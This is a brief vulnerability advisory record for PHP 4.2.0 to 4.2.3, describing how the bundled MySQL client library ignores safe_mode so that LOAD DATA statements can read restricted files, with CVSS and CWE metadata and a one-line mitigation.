Vendor: PHP
By: SecurityFocus
CVSS: 7.5 (HIGH)
Bypassing PHP's 'safe_mode' Restrictions
CWE: 264
Product Name: PHP
Affected Version From: PHP 4.2.0
Affected Version To: PHP 4.2.3
Patch Exists: YES
Related CWE: N/A
CPE: a:php:php:4.2.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002
Bypassing PHP’s ‘safe_mode’ Restrictions
A problem has been discovered that may allow an attacker to bypass the restrictions of PHP's 'safe_mode' feature to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled. In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').
Mitigation:
Ensure that the MySQL client library is properly honoring 'safe_mode' restrictions.